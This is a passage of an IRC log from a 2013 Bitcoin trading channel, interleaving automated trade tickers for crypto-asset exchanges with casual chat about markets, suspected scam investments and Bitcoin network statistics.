allowed to vote? Jun 27 06:18:06 just use NSA algorithmic vote ascertainment Jun 27 06:18:33 something like that. Jun 27 06:18:49 [BTCTC] [TAT.ASICMINER] 1 @ 0.0345 BTC [+] Jun 27 06:19:30 voting does feel pretty useless these days Jun 27 06:19:58 the irony is painful Jun 27 06:20:06 [BTCTC] [S.DICE-PT] 11 @ 0.0021 = 0.0231 BTC [-] Jun 27 06:20:54 people saying they dont vote as a form of protest make no less sense than people that do vote for 1 of 2 idiots that won't make any difference anyway Jun 27 06:21:41 apathy abounds Jun 27 06:22:03 [BTCTC] [TAT.ASICMINER] 2 @ 0.034017 = 0.068 BTC [-] Jun 27 06:23:21 [HAVELOCK] [ASICM] 1 @ 0.03419999 BTC [+] Jun 27 06:26:01 [BTCTC] [COGNITIVE] 1 @ 0.44899 BTC [+] Jun 27 06:26:54 [BTCTC] [DMS.PURCHASE] 25 @ 0.053794 = 1.3449 BTC [-] Jun 27 06:29:40 [BTCTC] [BTC-BOND] 3 @ 0.009999 = 0.03 BTC [-] Jun 27 06:29:47 [HAVELOCK] [ASICM] 7 @ 0.03419999 = 0.2394 BTC [+] Jun 27 06:29:59 [BTCTC] [DMS.SELLING] 10 @ 0.0335 = 0.335 BTC [-] Jun 27 06:31:50 [BTCTC] [TAT.ASICMINER] 1 @ 0.034487 BTC [+] Jun 27 06:32:01 [BTCTC] [ASICMINER-PT] 2 @ 3.463987 = 6.928 BTC [-] Jun 27 06:32:03 [BTCTC] [TAT.ASICMINER] 2 @ 0.034486 = 0.069 BTC [-] Jun 27 06:32:04 [BTCTC] [ASICMINER-PT] 1 @ 3.463988 BTC [+] Jun 27 06:32:06 [BTCTC] [ASICMINER-PT] 1 @ 3.46399 BTC [+] Jun 27 06:32:33 [MPEX] [S.MPOE] 6647 @ 0.00081894 = 5.4435 BTC [-] Jun 27 06:32:38 [HAVELOCK] [ASICM] 1 @ 0.03419999 BTC [+] Jun 27 06:34:22 [BTCTC] [TAT.ASICMINER] 1 @ 0.034483 BTC [-] Jun 27 06:34:39 [BTCTC] [CRYPTO-TRADE] 1 @ 0.19997 BTC [+] Jun 27 06:35:17 [BTCTC] [DMS.MINING] 5 @ 0.0209 = 0.1045 BTC [+] Jun 27 06:35:20 [BTCTC] [TAT.ASICMINER] 2 @ 0.034019 = 0.068 BTC [-] Jun 27 06:36:54 [HAVELOCK] [ASICM] 46 @ 0.03419999 = 1.5732 BTC [+] Jun 27 06:37:15 [HAVELOCK] [ASICM] 60 @ 0.0342 = 2.052 BTC [+] Jun 27 06:37:21 [BTCTC] [DMS.MINING] 6 @ 0.0209 = 0.1254 BTC [+] Jun 27 06:37:23 [BTCTC] [DMS.MINING] 18 @ 0.020999 = 0.378 BTC [+] Jun 27 06:37:23 [BTCTC] [TAT.ASICMINER] 29 @ 0.034018 = 0.9865 BTC [-] Jun 27 06:37:24 [BTCTC] [DMS.MINING] 45 @ 0.021 = 0.945 BTC [+] Jun 27 06:37:26 [BTCTC] [DMS.MINING] 22 @ 0.02119 = 0.4662 BTC [+] Jun 27 06:37:27 [BTCTC] [DMS.MINING] 48 @ 0.0212 = 1.0176 BTC [+] Jun 27 06:37:28 [BTCTC] [DMS.MINING] 31 @ 0.021999 = 0.682 BTC [+] Jun 27 06:37:29 [BTCTC] [DMS.MINING] 10 @ 0.022 = 0.22 BTC [+] Jun 27 06:37:30 [BTCTC] [DMS.MINING] 100 @ 0.022 = 2.2 BTC [+] Jun 27 06:37:32 [BTCTC] [DMS.MINING] 10 @ 0.022868 = 0.2287 BTC [+] Jun 27 06:37:33 [BTCTC] [DMS.MINING] 10 @ 0.023 = 0.23 BTC [+] Jun 27 06:37:34 [BTCTC] [DMS.MINING] 50 @ 0.023 = 1.15 BTC [+] Jun 27 06:37:35 [BTCTC] [DMS.MINING] 50 @ 0.024 = 1.2 BTC [+] Jun 27 06:37:37 [HAVELOCK] [ASICM] 7 @ 0.0342 = 0.2394 BTC [+] Jun 27 06:38:24 [BTCTC] [S.DICE-PT] 5 @ 0.0021 = 0.0105 BTC [-] Jun 27 06:43:31 [BTCTC] [CRYPTO-TRADE] 1 @ 0.1985 BTC [-] Jun 27 06:44:21 [BTCTC] [ASICMINER-PT] 1 @ 3.46399 BTC [+] Jun 27 06:44:25 [BTCTC] [TAT.ASICMINER] 6 @ 0.034018 = 0.2041 BTC [-] Jun 27 06:44:41 [BTCTC] [DMS.SELLING] 54 @ 0.0335 = 1.809 BTC [-] Jun 27 06:44:43 [BTCTC] [DMS.SELLING] 5 @ 0.033311 = 0.1666 BTC [-] Jun 27 06:44:44 [BTCTC] [DMS.SELLING] 38 @ 0.0331 = 1.2578 BTC [-] Jun 27 06:45:12 [BTCTC] [DMS.PURCHASE] 90 @ 0.053794 = 4.8415 BTC [-] Jun 27 06:45:28 [BTCTC] [TAT.ASICMINER] 1 @ 0.034018 BTC [-] Jun 27 06:45:32 [HAVELOCK] [ASICM] 30 @ 0.0342 = 1.026 BTC [+] Jun 27 06:46:33 [BTCTC] [TAT.ASICMINER] 4 @ 0.034018 = 0.1361 BTC [-] Jun 27 06:46:50 [BTCTC] [ASICMINER-PT] 1 @ 3.464 BTC [+] Jun 27 06:47:26 [HAVELOCK] [HIM] 3 @ 0.298999 = 0.897 BTC [-] Jun 27 06:47:34 [BTCTC] [ASICMINER-PT] 1 @ 3.465 BTC [+] Jun 27 06:49:56 [BTCTC] [DMS.MINING] 10 @ 0.020885 = 0.2089 BTC [-] Jun 27 06:49:56 [BTCTC] [DMS.MINING] 20 @ 0.020884 = 0.4177 BTC [-] Jun 27 06:49:58 [BTCTC] [DMS.MINING] 12 @ 0.02088 = 0.2506 BTC [-] Jun 27 06:50:10 [BTCTC] [TAT.ASICMINER] 7 @ 0.034018 = 0.2381 BTC [-] Jun 27 06:50:38 [BTCTC] [BTC-BOND] 30 @ 0.009999 = 0.3 BTC [-] Jun 27 06:51:04 [BTCTC] [DMS.SELLING] 2 @ 0.033001 = 0.066 BTC [-] Jun 27 06:51:06 [BTCTC] [DMS.SELLING] 10 @ 0.033 = 0.33 BTC [-] Jun 27 06:51:07 [BTCTC] [DMS.SELLING] 20 @ 0.033 = 0.66 BTC [-] Jun 27 06:51:09 [BTCTC] [DMS.SELLING] 10 @ 0.0325 = 0.325 BTC [-] Jun 27 06:52:44 [BTCTC] [DMS.PURCHASE] 45 @ 0.053794 = 2.4207 BTC [-] Jun 27 06:52:54 [BTCTC] [ASICMINER-PT] 1 @ 3.464 BTC [-] Jun 27 06:53:42 [MPEX] [S.MPOE] 3450 @ 0.00081576 = 2.8144 BTC [-] Jun 27 06:55:02 [BTCTC] [TAT.ASICMINER] 15 @ 0.034018 = 0.5103 BTC [-] Jun 27 06:55:33 [BTCTC] [DMS.PURCHASE] 4 @ 0.053794 = 0.2152 BTC [-] Jun 27 06:58:21 [MPEX] [S.DICE] 3608 @ 0.002 = 7.216 BTC [-] Jun 27 06:58:49 [MPEX] [S.DICE] 2500 @ 0.0019061 = 4.7653 BTC [-] Jun 27 06:58:57 [HAVELOCK] [ASICM] 97 @ 0.0341 = 3.3077 BTC [-] Jun 27 06:58:58 [HAVELOCK] [ASICM] 2 @ 0.0342 = 0.0684 BTC [+] Jun 27 06:59:08 http://www.forbes.com/sites/andygreenberg/2013/06/26/bitcoin-black-market-competition-heats-up-with-pro-marketing-and-millions-at-stake/ Jun 27 06:59:10 Bitcoin Black Market Competition Heats Up, With Pro Marketing And Millions At Stake - Forbes Jun 27 06:59:13 [MPEX] [S.DICE] 1000 @ 0.001906 = 1.906 BTC [-] Jun 27 06:59:34 [MPEX] [S.DICE] 5000 @ 0.00180109 = 9.0055 BTC [-] Jun 27 06:59:38 that'll end well Jun 27 06:59:59 [MPEX] [S.DICE] 1000 @ 0.00180108 = 1.8011 BTC [-] Jun 27 07:00:24 [BTCTC] [TAT.ASICMINER] 36 @ 0.034018 = 1.2246 BTC [-] Jun 27 07:02:10 Only 84,000 shares between S.DICE value of .0018 and .0000475 Jun 27 07:03:12 i find it a little dubious that i got the sum total of all these pro bullshitters and nobody said a peep Jun 27 07:03:21 meanwhile they're still pumping whatever nonsense. Jun 27 07:08:25 this is the price of being candid and self-righteous Jun 27 07:08:35 and averse to marketing Jun 27 07:10:02 [BTCTC] [TAT.ASICMINER] 3 @ 0.034468 = 0.1034 BTC [+] Jun 27 07:11:30 [BTCTC] [DMS.PURCHASE] 13 @ 0.053794 = 0.6993 BTC [-] Jun 27 07:12:35 [BTCTC] [ASICMINER-PT] 1 @ 3.44 BTC [-] Jun 27 07:17:07 [HAVELOCK] [ASICM] 1 @ 0.034 BTC [-] Jun 27 07:18:31 laughed my ass off at that video -- that's priceless! Jun 27 07:22:39 i'd rather spend my money on their wives. Jun 27 07:22:59 [MPEX] [S.DICE] 1000 @ 0.00180107 = 1.8011 BTC [-] Jun 27 07:23:19 [BTCTC] [DMS.MINING] 4 @ 0.021968 = 0.0879 BTC [+] Jun 27 07:23:24 [MPEX] [S.DICE] 1 @ 0.00180106 BTC [-] Jun 27 07:23:43 [MPEX] [S.DICE] 5000 @ 0.00180103 = 9.0052 BTC [-] Jun 27 07:23:50 i went to Best Buy today with the thought of buying myself a present Jun 27 07:23:56 walked out empty-handed Jun 27 07:24:02 i dont even know what i want anymore Jun 27 07:24:06 [MPEX] [S.DICE] 275 @ 0.0017 = 0.4675 BTC [-] Jun 27 07:24:20 you dont need presents obv Jun 27 07:24:26 [MPEX] [S.DICE] 9 @ 0.0016764 = 0.0151 BTC [-] Jun 27 07:24:52 [MPEX] [S.DICE] 607 @ 0.00167639 = 1.0176 BTC [-] Jun 27 07:25:10 [BTCTC] [ASICMINER-PT] 1 @ 3.464 BTC [+] Jun 27 07:25:12 [BTCTC] [ASICMINER-PT] 5 @ 3.465 = 17.325 BTC [+] Jun 27 07:25:40 for that matter, i'd rather spend the money on having "the press" publish sharpie in pooper pics Jun 27 07:25:45 than whatever they currently do. Jun 27 07:26:07 maybe you should start your own media company Jun 27 07:26:31 Sharpoopies SLR Jun 27 07:26:34 [MPEX] [S.MPOE] 10873 @ 0.00081876 = 8.9024 BTC [+] Jun 27 07:26:46 [MPEX] [S.MPOE] 3977 @ 0.00081905 = 3.2574 BTC [+] Jun 27 07:27:13 nah. Jun 27 07:27:17 [HAVELOCK] [HIM] 1 @ 0.295 BTC [-] Jun 27 07:27:38 SRL i mean Jun 27 07:27:42 the day will come. i will be having my pics. Jun 27 07:27:51 [BTCTC] [TAT.ASICMINER] 1 @ 0.0342 BTC [-] Jun 27 07:30:24 [BTCTC] [ASICMINER-PT] 1 @ 3.464 BTC [-] Jun 27 07:30:36 [BTCTC] [ASICMINER-PT] 2 @ 3.465 = 6.93 BTC [+] Jun 27 07:31:42 [BTCTC] [TAT.ASICMINER] 1 @ 0.0343 BTC [+] Jun 27 07:32:40 [BTCTC] [TAT.ASICMINER] 1 @ 0.0344 BTC [+] Jun 27 07:32:43 [BTCTC] [TAT.ASICMINER] 5 @ 0.034431 = 0.1722 BTC [+] Jun 27 07:34:25 What happened to the huge buy orders for S.DICE around 0.002? Jun 27 07:34:36 Were they removed or sold into? Jun 27 07:34:56 [MPEX] [S.DICE] 900 @ 0.00215 = 1.935 BTC [+] Jun 27 07:34:57 [MPEX] [S.DICE] 2000 @ 0.00219999 = 4.4 BTC [+] Jun 27 07:35:11 [BTCTC] [ASICMINER-PT] 1 @ 3.464 BTC [-] Jun 27 07:35:24 [BTCTC] [ASICMINER-PT] 6 @ 3.465 = 20.79 BTC [+] Jun 27 07:35:26 [BTCTC] [ASICMINER-PT] 1 @ 3.469 BTC [+] Jun 27 07:35:33 [HAVELOCK] [ASICM] 5 @ 0.0341 = 0.1705 BTC [+] Jun 27 07:35:56 [BTCTC] [TAT.ASICMINER] 2 @ 0.034398 = 0.0688 BTC [-] Jun 27 07:36:00 when is mp's brithday Jun 27 07:36:05 I want to send him http://fuckyounofuck.me/image/48730023754 Jun 27 07:36:44 [BTCTC] [TAT.ASICMINER] 1 @ 0.03435 BTC [-] Jun 27 07:37:25 ... Jun 27 07:37:57 [BTCTC] [TAT.ASICMINER] 24 @ 0.03435 = 0.8244 BTC [-] Jun 27 07:38:05 lol Jun 27 07:38:19 incidentally, judging by just-dice betting patterns i'd say whales actually exist. Jun 27 07:38:34 i very much doubt doog is faking hsi bets seeing how it'd just cost him Jun 27 07:38:55 hahah pic related http://25.media.tumblr.com/dab90b2b0369c804c9821c81740b8403/tumblr_mlcypcrfXG1qkuj9no1_500.jpg Jun 27 07:42:35 [BTCTC] [TAT.VIRTUALMINE] 149 @ 0.005111 = 0.7615 BTC [+] Jun 27 07:42:39 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.005111 BTC [+] Jun 27 07:42:40 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00511 BTC [-] Jun 27 07:42:42 [BTCTC] [TAT.VIRTUALMINE] 250 @ 0.0051 = 1.275 BTC [-] Jun 27 07:43:49 The only reason he'd have to fake bets is if he intended to raise and run with the 1.25 million USD value in the invested wallet. Jun 27 07:45:25 [BTCTC] [TAT.ASICMINER] 10 @ 0.03435 = 0.3435 BTC [-] Jun 27 07:45:59 [BTCTC] [TAT.ASICMINER] 19 @ 0.0341 = 0.6479 BTC [-] Jun 27 07:46:37 [BTCTC] [S.BBET-PT] 1 @ 0.00141 BTC [-] Jun 27 07:47:32 [BTCTC] [TAT.ASICMINER] 7 @ 0.034558 = 0.2419 BTC [+] Jun 27 07:48:34 somehow i sdoubt that. Jun 27 07:48:40 [BTCTC] [TAT.ASICMINER] 9 @ 0.034102 = 0.3069 BTC [-] Jun 27 07:48:42 [BTCTC] [TAT.ASICMINER] 5 @ 0.0341 = 0.1705 BTC [-] Jun 27 07:48:42 [BTCTC] [TAT.ASICMINER] 34 @ 0.03405 = 1.1577 BTC [-] Jun 27 07:49:34 [BTCTC] [ASICMINER-PT] 1 @ 3.47 BTC [+] Jun 27 07:51:52 [BTCTC] [S.DICE-PT] 24 @ 0.00209 = 0.0502 BTC [-] Jun 27 07:52:51 [BTCTC] [TAT.ASICMINER] 1 @ 0.034553 BTC [+] Jun 27 07:54:06 So am I Jun 27 07:54:51 [BTCTC] [S.MPOE-PT] 10 @ 0.001 = 0.01 BTC [-] Jun 27 07:55:48 [BTCTC] [DMS.PURCHASE] 120 @ 0.053794 = 6.4553 BTC [-] Jun 27 07:56:35 [BTCTC] [S.MPOE-PT] 6 @ 0.001 = 0.006 BTC [-] Jun 27 07:56:53 [BTCTC] [DMS.MINING] 4 @ 0.021001 = 0.084 BTC [-] Jun 27 07:56:54 [BTCTC] [DMS.MINING] 10 @ 0.021 = 0.21 BTC [-] Jun 27 07:56:56 [BTCTC] [DMS.MINING] 60 @ 0.021 = 1.26 BTC [-] Jun 27 07:57:25 [BTCTC] [DMS.SELLING] 4 @ 0.032501 = 0.13 BTC [+] Jun 27 07:57:27 [BTCTC] [DMS.SELLING] 40 @ 0.0325 = 1.3 BTC [-] Jun 27 07:57:28 [BTCTC] [DMS.SELLING] 10 @ 0.03211 = 0.3211 BTC [-] Jun 27 07:57:28 [BTCTC] [DMS.SELLING] 50 @ 0.032101 = 1.6051 BTC [-] Jun 27 07:57:50 [BTCTC] [DMS.PURCHASE] 90 @ 0.053794 = 4.8415 BTC [-] Jun 27 07:58:24 [BTCTC] [TAT.ASICMINER] 1 @ 0.034052 BTC [-] Jun 27 07:58:47 [BTCTC] [TAT.ASICMINER] 11 @ 0.034051 = 0.3746 BTC [-] Jun 27 07:58:58 [BTCTC] [TAT.ASICMINER] 1 @ 0.034547 BTC [+] Jun 27 07:59:14 [BTCTC] [TAT.ASICMINER] 1 @ 0.03405 BTC [-] Jun 27 08:01:17 [BTCTC] [ASICMINER-PT] 4 @ 3.469999 = 13.88 BTC [-] Jun 27 08:01:44 [MPEX] [S.MPOE] 3373 @ 0.00081905 = 2.7627 BTC [+] Jun 27 08:01:46 [MPEX] [S.MPOE] 2400 @ 0.00081996 = 1.9679 BTC [+] Jun 27 08:01:50 [MPEX] [S.MPOE] 21061 @ 0.00082135 = 17.2985 BTC [+] Jun 27 08:01:56 [BTCTC] [ASICMINER-PT] 1 @ 3.469999 BTC [-] Jun 27 08:06:15 [BTCTC] [BASIC-MINING] 1 @ 2.18 BTC [+] Jun 27 08:08:40 [BTCTC] [ASICMINER-PT] 1 @ 3.433002 BTC [-] Jun 27 08:08:41 [BTCTC] [ASICMINER-PT] 1 @ 3.433001 BTC [-] Jun 27 08:09:26 [BTCTC] [COGNITIVE] 5 @ 0.44899 = 2.245 BTC [+] Jun 27 08:10:36 [BTCTC] [ASICMINER-PT] 1 @ 3.433001 BTC [-] Jun 27 08:11:20 [BTCTC] [COGNITIVE] 3 @ 0.44899 = 1.347 BTC [+] Jun 27 08:11:38 [BTCTC] [COGNITIVE] 10 @ 0.449 = 4.49 BTC [+] Jun 27 08:11:59 [BTCTC] [COGNITIVE] 10 @ 0.4499 = 4.499 BTC [+] Jun 27 08:12:46 [BTCTC] [COGNITIVE] 10 @ 0.45 = 4.5 BTC [+] Jun 27 08:16:00 [HAVELOCK] [ASICM] 3 @ 0.034 = 0.102 BTC [-] Jun 27 08:20:19 [BTCTC] [ASICMINER-PT] 3 @ 3.433001 = 10.299 BTC [-] Jun 27 08:20:53 [BTCTC] [ASICMINER-PT] 1 @ 3.433 BTC [-] Jun 27 08:23:04 [BTCTC] [BASIC-MINING] 1 @ 2.090026 BTC [-] Jun 27 08:31:49 [BTCTC] [TAT.ASICMINER] 47 @ 0.034511 = 1.622 BTC [+] Jun 27 08:40:12 [HAVELOCK] [ASICM] 11 @ 0.0338 = 0.3718 BTC [-] Jun 27 08:41:26 [BTCTC] [BASIC-MINING] 1 @ 2.188982 BTC [+] Jun 27 08:41:27 [MPEX] [S.MPOE] 15271 @ 0.00082262 = 12.5622 BTC [+] Jun 27 08:41:39 [MPEX] [S.MPOE] 379 @ 0.00082403 = 0.3123 BTC [+] Jun 27 08:42:34 [BTCTC] [MININGCO.ETF] 1 @ 0.95 BTC [+] Jun 27 08:43:48 [BTCTC] [GSDPT] 5 @ 0.002449 = 0.0122 BTC [-] Jun 27 08:43:52 [BTCTC] [DMS.PURCHASE] 60 @ 0.053794 = 3.2276 BTC [-] Jun 27 08:46:27 [BTCTC] [COG.F] 1 @ 4.99 BTC [+] Jun 27 08:50:00 [BTCTC] [S.DICE-PT] 2 @ 0.002061 = 0.0041 BTC [-] Jun 27 08:50:15 [BTCTC] [DMS.SELLING] 1 @ 0.031701 BTC [-] Jun 27 08:52:37 [BTCTC] [ASICMINER-PT] 2 @ 3.464 = 6.928 BTC [+] Jun 27 08:53:21 [HAVELOCK] [HIM] 1 @ 0.299999 BTC [+] Jun 27 08:53:30 [BTCTC] [TAT.ASICMINER] 1 @ 0.034501 BTC [-] Jun 27 08:53:34 ;;nethash Jun 27 08:53:35 160455.674236 Jun 27 08:53:44 ;;bc,stats Jun 27 08:53:47 Current Blocks: 243539 | Current Difficulty: 1.933925827238668E7 | Next Difficulty At Block: 243935 | Next Difficulty In: 396 blocks | Next Difficulty In About: 2 days, 8 hours, 54 minutes, and 36 seconds | Next Difficulty Estimate: 21036119.3594 | Estimated Percent Change: 8.77418 Jun 27 08:58:23 [BTCTC] [ASICMINER-PT] 2 @ 3.464 = 6.928 BTC [+] Jun 27 08:58:25 [BTCTC] [ASICMINER-PT] 1 @ 3.465 BTC [+] Jun 27 08:58:27 [BTCTC] [ASICMINER-PT] 1 @ 3.465981 BTC [+] Jun 27 08:58:29 [BTCTC] [ASICMINER-PT] 1 @ 3.466 BTC [+] Jun 27 08:59:28 [BTCTC] [TAT.ASICMINER] 59 @ 0.034501 = 2.0356 BTC [-] Jun 27 09:00:21 [BTCTC] [TAT.ASICMINER] 36 @ 0.03456 = 1.2442 BTC [+] Jun 27 09:00:30 [BTCTC] [TAT.ASICMINER] 2 @ 0.034201 = 0.0684 BTC [-] Jun 27 09:02:02 [BTCTC] [ASICMINER-PT] 1 @ 3.467 BTC [+] Jun 27 09:03:33 [HAVELOCK] [ASICM] 28 @ 0.0341 = 0.9548 BTC [+] Jun 27 09:04:28 [BTCTC] [ASICMINER-PT] 3 @ 3.46797 = 10.4039 BTC [+] Jun 27 09:04:30 [BTCTC] [ASICMINER-PT] 3 @ 3.46798 = 10.4039 BTC [+] Jun 27 09:04:31 [BTCTC] [ASICMINER-PT] 2 @ 3.468 = 6.936 BTC [+] Jun 27 09:04:32 [BTCTC] [ASICMINER-PT] 4 @ 3.47 = 13.88 BTC [+] Jun 27 09:04:34 [BTCTC] [ASICMINER-PT] 2 @ 3.471 = 6.942 BTC [+] Jun 27 09:04:35 [BTCTC] [ASICMINER-PT] 1 @ 3.472 BTC [+] Jun 27 09:04:37 [BTCTC] [ASICMINER-PT] 1 @ 3.474 BTC [+] Jun 27 09:04:39 [BTCTC] [ASICMINER-PT] 2 @ 3.475 = 6.95 BTC [+] Jun 27 09:04:41 [BTCTC] [ASICMINER-PT] 2 @ 3.477 = 6.954 BTC [+] Jun 27 09:04:43 [BTCTC] [ASICMINER-PT] 1 @ 3.479 BTC [+] Jun 27 09:04:45 [BTCTC] [ASICMINER-PT] 3 @ 3.48 = 10.44 BTC [+] Jun 27 09:05:04 [BTCTC] [S.MPOE-PT] 12 @ 0.000811 = 0.0097 BTC [-] Jun 27 09:07:21 [BTCTC] [TAT.ASICMINER] 32 @ 0.03456 = 1.1059 BTC [+] Jun 27 09:07:51 [MPEX] [S.MPOE] 12300 @ 0.00082408 = 10.1362 BTC [+] Jun 27 09:07:54 [MPEX] [S.MPOE] 2700 @ 0.00082474 = 2.2268 BTC [+] Jun 27 09:08:08 [MPEX] [S.MPOE] 1709 @ 0.00082944 = 1.4175 BTC [+] Jun 27 09:08:25 [BTCTC] [TAT.ASICMINER] 12 @ 0.0346 = 0.4152 BTC [+] Jun 27 09:12:59 [BTCTC] [DMS.MINING] 120 @ 0.021 = 2.52 BTC [-] Jun 27 09:15:07 [MPEX] [S.MPOE] 8400 @ 0.00082944 = 6.9673 BTC [+] Jun 27 09:17:07 [HAVELOCK] [ASICM] 19 @ 0.034099 = 0.6479 BTC [-] Jun 27 09:17:32 [BTCTC] [S.MPOE-PT] 10 @ 0.000989 = 0.0099 BTC [+] Jun 27 09:17:44 ;;ticker Jun 27 09:17:45 MtGox BTCUSD ticker | Best bid: 102.83001, Best ask: 102.89000, Bid-ask spread: 0.05999, Last trade: 102.89000, 24 hour volume: 10579.41673653, 24 hour low: 102.50000, 24 hour high: 105.48990, 24 hour vwap: 103.98892 Jun 27 09:25:21 [BTCTC] [TAT.ASICMINER] 20 @ 0.0343 = 0.686 BTC [-] Jun 27 09:26:23 [BTCTC] [TAT.ASICMINER] 45 @ 0.034201 = 1.539 BTC [-] Jun 27 09:28:29 [MPEX] [S.MPOE] 4200 @ 0.00082179 = 3.4515 BTC [-] Jun 27 09:29:45 [BTCTC] [ASICMINER-PT] 1 @ 3.4755 BTC [-] Jun 27 09:31:44 [BTCTC] [TAT.ASICMINER] 8 @ 0.034501 = 0.276 BTC [+] Jun 27 09:32:50 zhoutongs new biz Jun 27 09:32:51 https://coinjar.io/about Jun 27 09:32:54 CoinJar Jun 27 09:33:00 Ryan is a veteran entrepreneur and Bitcoin guru. Technically and commercially adept, he’s founded several successful startups and remains a prominent figure in the Bitcoin community. Jun 27 09:33:13 is this a new scammer description? Jun 27 09:35:03 [HAVELOCK] [SDICE] 5 @ 0.199999 = 1 BTC [+] Jun 27 09:35:20 [HAVELOCK] [ASICM] 31 @ 0.034099 = 1.0571 BTC [-] Jun 27 09:36:00 [HAVELOCK] [SDICE] 1 @ 0.199999 BTC [+] Jun 27 09:36:22 [HAVELOCK] [ASICM] 8 @ 0.0341 = 0.2728 BTC [+] Jun 27 09:38:26 lmao Jun 27 09:39:54 "We bring innovation to payment systems" Jun 27 09:40:15 why do all the kids agglomerate around this particular nonstarter ? Jun 27 09:40:35 we srsly do not need any more of these ; none of them will survive. from gox to bitpay and back and again, all are doomed. Jun 27 09:41:06 that aside, "the team" pix are pretty epic. three azn stooges. **** BEGIN LOGGING AT Thu Jun 27 16:49:18 2013 Jun 27 16:49:25 [BTCTC] [TAT.ASICMINER] 5 @ 0.03375 = 0.1688 BTC [+] Jun 27 16:49:26 [BTCTC] [ASICMINER-PT] 1 @ 3.38 BTC [-] Jun 27 16:49:29 [BTCTC] [ASICMINER-PT] 1 @ 3.375 BTC [-] Jun 27 16:49:31 I'm just naming myself after what people tell me I am Jun 27 16:49:31 [BTCTC] [ASICMINER-PT] 1 @ 3.372 BTC [-] Jun 27 16:49:41 ;) Jun 27 16:49:58 a troll? Jun 27 16:50:08 i wonder what our names would be if we all did that Jun 27 16:50:08 [BTCTC] [AMC-PT] 1200 @ 0.0025 = 3 BTC [-] Jun 27 16:50:14 imagine mine. Jun 27 16:50:16 [BTCTC] [TAT.ASICMINER] 20 @ 0.033602 = 0.672 BTC [-] Jun 27 16:50:45 [BTCTC] [TAT.ASICMINER] 15 @ 0.033601 = 0.504 BTC [-] Jun 27 16:51:06 [BTCTC] [COGNITIVE] 2 @ 0.53 = 1.06 BTC [+] Jun 27 16:51:39 [BTCTC] [TAT.ASICMINER] 3 @ 0.033602 = 0.1008 BTC [+] Jun 27 16:52:08 [BTCTC] [S.DICE-PT] 6 @ 0.002056 = 0.0123 BTC [-] Jun 27 16:52:41 [BTCTC] [TAT.ASICMINER] 85 @ 0.033601 = 2.8561 BTC [-] Jun 27 16:52:42 [BTCTC] [TAT.ASICMINER] 2 @ 0.0336 = 0.0672 BTC [-] Jun 27 16:52:44 [BTCTC] [TAT.ASICMINER] 25 @ 0.0336 = 0.84 BTC [-] Jun 27 16:52:45 [BTCTC] [TAT.ASICMINER] 4 @ 0.0336 = 0.1344 BTC [-] Jun 27 16:52:47 [BTCTC] [ASICMINER-PT] 3 @ 3.372 = 10.116 BTC [-] Jun 27 16:52:55 [BTCTC] [AMC-PT] 5 @ 0.0025 = 0.0125 BTC [-] Jun 27 16:53:01 mp will the girl be chiming in on this AMC fiasco? Jun 27 16:53:40 [BTCTC] [ASICMINER-PT] 1 @ 3.371101 BTC [-] Jun 27 16:53:58 [BTCTC] [AMC-PT] 9 @ 0.0025 = 0.0225 BTC [-] Jun 27 16:54:02 went from $8m valuation to $25m overnight Jun 27 16:54:04 beat that Jun 27 16:54:38 [BTCTC] [TAT.ASICMINER] 40 @ 0.0335 = 1.34 BTC [-] Jun 27 16:54:40 [BTCTC] [TAT.ASICMINER] 41 @ 0.033488 = 1.373 BTC [-] Jun 27 16:54:44 [HAVELOCK] [SDICE] 2 @ 0.185501 = 0.371 BTC [-] Jun 27 16:55:04 [HAVELOCK] [VTX] 2 @ 0.45100666 = 0.902 BTC [-] Jun 27 16:55:52 [BTCTC] [AMC-PT] 40 @ 0.0025 = 0.1 BTC [-] Jun 27 16:55:52 [HAVELOCK] [ASICM] 1 @ 0.033899 BTC [+] Jun 27 16:56:04 jurov http://trilema.com/2013/in-re-noobs-and-conventions/#comment-93733 Jun 27 16:56:06 :D Jun 27 16:56:12 [HAVELOCK] [ASICM] 10 @ 0.033899 = 0.339 BTC [+] Jun 27 16:56:28 ThickAsThieves not rly. i mean it's quite plain it's a scam, right ? Jun 27 16:57:02 what's the point arguing with some socks saying "o great investment" and everyone else sth ? it's fun in cases like that bitbillions nut, but otherwise... Jun 27 16:57:15 [BTCTC] [AMC-PT] 1 @ 0.0025 BTC [-] Jun 27 16:57:37 Ken Slaughter is a true nut Jun 27 16:57:50 he's just learned not to say much on forums Jun 27 16:58:48 [BTCTC] [AMC-PT] 12 @ 0.0025 = 0.03 BTC [-] Jun 27 16:59:30 [BTCTC] [AMC-PT] 50 @ 0.0025 = 0.125 BTC [-] Jun 27 16:59:47 anyway, i'm sure it'll pay "dividends" for a while, reach the usual 30% and go away. Jun 27 17:00:13 [BTCTC] [AMC-PT] 12 @ 0.0025 = 0.03 BTC [-] Jun 27 17:00:16 where did you get that 30% btw Jun 27 17:00:20 [HAVELOCK] [VTX] 1 @ 0.45100666 BTC [-] Jun 27 17:00:33 gut assessment over time? Jun 27 17:00:35 experience. Jun 27 17:00:49 word Jun 27 17:00:51 pretty much all fake assets/pmbs/etc work out to paying back ~30% of the net investment Jun 27 17:01:02 [BTCTC] [TAT.ASICMINER] 2 @ 0.033488 = 0.067 BTC [-] Jun 27 17:01:13 i imagine it's some sort of natural sweet spot as to where the hope of further investment no longer justifies the service efforts. Jun 27 17:01:18 servicing* Jun 27 17:01:19 [BTCTC] [AMC-PT] 799 @ 0.0025 = 1.9975 BTC [-] Jun 27 17:01:21 [HAVELOCK] [HIM] 10 @ 0.298996 = 2.99 BTC [-] Jun 27 17:01:38 [BTCTC] [AMC-PT] 1000 @ 0.0025 = 2.5 BTC [-] Jun 27 17:01:48 somehow naturally occuring, as most of the fraudsters are "honest" fraudsters (ie, not in control of their fraud) Jun 27 17:01:57 but i don't really have the math for it yet so. Jun 27 17:02:03 [BTCTC] [AMC-PT] 1000 @ 0.0025 = 2.5 BTC [-] Jun 27 17:02:04 [HAVELOCK] [HIM] 10 @ 0.298997 = 2.99 BTC [+] Jun 27 17:02:24 [BTCTC] [TAT.ASICMINER] 10 @ 0.03349 = 0.3349 BTC [+] Jun 27 17:02:31 I've paid 10% of TAT.VM so far ;) Jun 27 17:02:34 hehe Jun 27 17:02:40 so you're 1/3 of the way there. Jun 27 17:02:45 anyway, it Jun 27 17:02:52 's actually what i use to make predictions. Jun 27 17:03:14 [BTCTC] [TAT.ASICMINER] 13 @ 0.033601 = 0.4368 BTC [+] Jun 27 17:03:16 [BTCTC] [TAT.ASICMINER] 4 @ 0.033602 = 0.1344 BTC [+] Jun 27 17:05:33 